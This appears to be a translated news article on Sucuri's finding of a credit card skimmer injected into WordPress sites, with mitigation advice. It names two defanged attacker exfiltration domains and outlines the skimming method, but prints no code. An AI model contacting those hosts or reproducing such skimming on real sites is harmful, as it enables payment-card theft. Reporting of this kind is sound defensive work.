- Sucuri finds malicious code embedded in WordPress sites
- The code collects and extracts payment information from e-commerce websites.
- Researchers warn WordPress site administrators to inspect all custom code
Cybercriminals are once again attacking WordPress websites with credit card skimmers, stealing victims’ sensitive payment information in the process.
This time, the company sounding the alarm is Sucuri, whose researcher Puja Srivastava recently published new analysis on the attack, noting that criminals are targeting WordPress e-commerce websites by inserting malicious JavaScript code into a database table. associated with the content management system (CMS). .
This script opens the credit card skimmer just as the victim is about to enter payment information.
“The malware activates specifically on payment pages, either by hijacking existing payment fields or by injecting a fake credit card form,” the researcher said.
The anonymous skimmer was created to steal all payment information necessary for online transactions: credit card numbers, expiration dates, CVV numbers, and billing information.
Cybercriminals often use stolen credit card information to fund malicious advertising campaigns on social media platforms, purchase malware or malware as a service (MaaS), or purchase gift cards as they are difficult to trace.
Sucuri added that the skimmer can also capture data entered on legitimate payment screens in real time, thus maximizing compatibility.
All acquired information is encoded in Base64 and combined with AES-CBC encryption, to integrate with normal traffic. After that, it is extracted to a server under the attacker’s control (either “valhafather[.]xyz” or “fqbe23[.]xyz”).
To remove malware, Sucuri suggests inspecting all custom HTML widgets. This can be done by logging into the WordPress admin panel, navigating to wp-admin > Appearance > Widgets and checking all custom HTML block widgets for suspicious or unknown tags. The researchers also suggested mitigation measures, including regular updates, managing administrator accounts, monitoring file integrity, and running a web application firewall.
Skimmers seem to be gaining popularity again. Less than three weeks ago, the European Space Agency was found to be hosting this type of malicious code, which stole payment data, including sensitive credit card information, from countless victims.
Through Hacker News
